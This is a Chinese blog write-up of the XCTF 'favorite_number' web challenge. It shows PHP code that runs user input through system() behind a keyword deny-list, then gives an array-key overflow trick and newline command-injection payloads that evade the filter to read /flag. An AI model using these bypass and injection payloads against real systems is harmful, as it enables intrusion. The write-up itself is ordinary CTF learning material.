xctf攻防世界 Web高手进阶区 favorite_number

2024-01-31 05:20

本文主要是介绍xctf攻防世界 Web高手进阶区 favorite_number,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

作为一个新手,一路走来,人都麻了,就当积累知识点了!

1. 进入到题目场景,看到代码,因此想到代码审计

在这里插入图片描述

2.尝试分析代码

<?php
//php5.5.9
$stuff = $_POST["stuff"];  // 接收POST传过的参数,key为"stuff"
$array = ['admin', 'user'];
if($stuff === $array && $stuff[0] != 'admin') { // stuff的参数要与array恒等,且stuff数组第一个参数不能为admin$num= $_POST["num"]; // 接收POST传过的参数,key为"num"if (preg_match("/^\d+$/im",$num)){ // 正则匹配numif (!preg_match("/sh|wget|nc|python|php|perl|\?|flag|}|cat|echo|\*|\^|\]|\\\\|'|\"|\|/i",$num)){ // 用于过滤命令符echo "my favorite num is:";system("echo ".$num);}else{echo 'Bonjour!';}}
} else {highlight_file(__FILE__);
}

3. 分析代码

1. 分析一:
if($stuff === $array && $stuff[0] != 'admin')

既要保证完全等于,又要求第一个元素不等!因此只能猜到数组方面存在的漏洞(至于什么漏洞,想不到),参考大佬们的解题思路,发现对该漏洞解释的博客:

  • PHP数组的key溢出问题.
  • PHP的信息安全(入侵获取$flag)的题目【Q2】.

也就是说,定义 stuff[4294967296]=‘admin’ ,保证stuff[0]!=amdin$stuff === $array。(这点我还是没看懂为什么,求大佬科普一下)

于是构造post的payload参数:

stuff[4294967296]=admin&stuff[1]=user

2. 分析二:

preg_match("/^\d+$/im",$num)

其中/^表示正则匹配字符串的起始部分,\d表示匹配任何十进制数字,+表示匹配1次或者多次前面出现的表达式,$表示匹配字符串终止部分,/im中i(ignore)表示执行大小写不敏感的匹配,m(multiple)表示允许多行匹配。

但是我们需要字符去执行命令,因此^和$不只是匹配字符串的开头和结尾,也匹配一行的开头和一行的结尾。因此我们利用 %0a 换一行,把命令写在其他的行,这样这个正则匹配就只能匹配到第一行了。(%0A在ASCII表中表示换行符)

*注意:此处的hackbar不知道为啥,掉链子显示不出来,因此用burpsuite改包去操作

3. 分析三

preg_match("/sh|wget|nc|python|php|perl|\?|flag|}|cat|echo|\*|\^|\]|\\\\|'|\"|\|/i",$num)

对关键字符命令进行过滤,如果num中出现诸如此类的字符,则直接过滤掉

4. 使用burpsuite

1. 正常抓包

在这里插入图片描述

2. 修改payload

在这里插入图片描述

3. 绕过

如何可以对内容绕过,参考大佬的博客特殊字符绕过
我们可以利用这些方式来绕过(不考虑编码绕过之类的):

ca''t
cat""t
ca\t
ca``t    # 两个反斜点也可以

因此我们构造payload

stuff[4294967296]=admin&stuff[1]=user&num=123456%0Aca``t /fl``ag

如图:
在这里插入图片描述

4. 其他解决方法拓展(参考大佬的博客)
  1. 利用过滤字符

$*和$@,$x(x 代表 1-9),${x}(x>=10) :比如ca${21}t a.txt表示cat a.txt 在没有传入参数的情况下,这些特殊字符默认为空

num=1%0aca$1t /fl$1ag
num=1%0aca$@t /fl$@ag

本题中的{}符号已被过滤

  1. 利用文件的iNode号
    在这里插入图片描述

在这里插入图片描述
cat既然被过滤了,那就用tac绕过,然后利用反引号来读文件:
在这里插入图片描述

  1. 也是一种比较常用的方法,既然过滤了flag,而又没过滤$,就可以用变量拼接:
num=1%0Aa=f;b=lag;tac /$a$b;

如图:
在这里插入图片描述

5. 总结

  • 考察数字漏洞
  • 正则表达
  • 基本命令

我是跪着看完写完的,太难了o(╥﹏╥)o,如有问题,恳请批评指正

这篇关于xctf攻防世界 Web高手进阶区 favorite_number的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/662674

相关文章

Spring Boot + MyBatis Plus 高效开发实战从入门到进阶优化(推荐)

《SpringBoot+MyBatisPlus高效开发实战从入门到进阶优化(推荐)》本文将详细介绍SpringBoot+MyBatisPlus的完整开发流程,并深入剖析分页查询、批量操作、动... 目录Spring Boot + MyBATis Plus 高效开发实战:从入门到进阶优化1. MyBatis

JSON Web Token在登陆中的使用过程

《JSONWebToken在登陆中的使用过程》:本文主要介绍JSONWebToken在登陆中的使用过程,具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑完全的地方,望不吝赐教... 目录JWT 介绍微服务架构中的 JWT 使用结合微服务网关的 JWT 验证1. 用户登录,生成 JWT2. 自定义过滤

一文教你如何将maven项目转成web项目

《一文教你如何将maven项目转成web项目》在软件开发过程中,有时我们需要将一个普通的Maven项目转换为Web项目,以便能够部署到Web容器中运行,本文将详细介绍如何通过简单的步骤完成这一转换过程... 目录准备工作步骤一:修改​​pom.XML​​1.1 添加​​packaging​​标签1.2 添加

Java进阶学习之如何开启远程调式

《Java进阶学习之如何开启远程调式》Java开发中的远程调试是一项至关重要的技能,特别是在处理生产环境的问题或者协作开发时,:本文主要介绍Java进阶学习之如何开启远程调式的相关资料,需要的朋友... 目录概述Java远程调试的开启与底层原理开启Java远程调试底层原理JVM参数总结&nbsMbKKXJx

web网络安全之跨站脚本攻击(XSS)详解

《web网络安全之跨站脚本攻击(XSS)详解》:本文主要介绍web网络安全之跨站脚本攻击(XSS)的相关资料,跨站脚本攻击XSS是一种常见的Web安全漏洞,攻击者通过注入恶意脚本诱使用户执行,可能... 目录前言XSS 的类型1. 存储型 XSS(Stored XSS)示例:危害:2. 反射型 XSS(Re

MySQL进阶之路索引失效的11种情况详析

《MySQL进阶之路索引失效的11种情况详析》:本文主要介绍MySQL查询优化中的11种常见情况,包括索引的使用和优化策略,通过这些策略,开发者可以显著提升查询性能,需要的朋友可以参考下... 目录前言图示1. 使用不等式操作符(!=, <, >)2. 使用 OR 连接多个条件3. 对索引字段进行计算操作4

JavaScript中的reduce方法执行过程、使用场景及进阶用法

《JavaScript中的reduce方法执行过程、使用场景及进阶用法》:本文主要介绍JavaScript中的reduce方法执行过程、使用场景及进阶用法的相关资料,reduce是JavaScri... 目录1. 什么是reduce2. reduce语法2.1 语法2.2 参数说明3. reduce执行过程

解决JavaWeb-file.isDirectory()遇到的坑问题

《解决JavaWeb-file.isDirectory()遇到的坑问题》JavaWeb开发中,使用`file.isDirectory()`判断路径是否为文件夹时,需要特别注意:该方法只能判断已存在的文... 目录Jahttp://www.chinasem.cnvaWeb-file.isDirectory()遇

JavaWeb-WebSocket浏览器服务器双向通信方式

《JavaWeb-WebSocket浏览器服务器双向通信方式》文章介绍了WebSocket协议的工作原理和应用场景,包括与HTTP的对比,接着,详细介绍了如何在Java中使用WebSocket,包括配... 目录一、概述二、入门2.1 POM依赖2.2 编写配置类2.3 编写WebSocket服务2.4 浏

Python进阶之Excel基本操作介绍

《Python进阶之Excel基本操作介绍》在现实中,很多工作都需要与数据打交道,Excel作为常用的数据处理工具,一直备受人们的青睐,本文主要为大家介绍了一些Python中Excel的基本操作,希望... 目录概述写入使用 xlwt使用 XlsxWriter读取修改概述在现实中,很多工作都需要与数据打交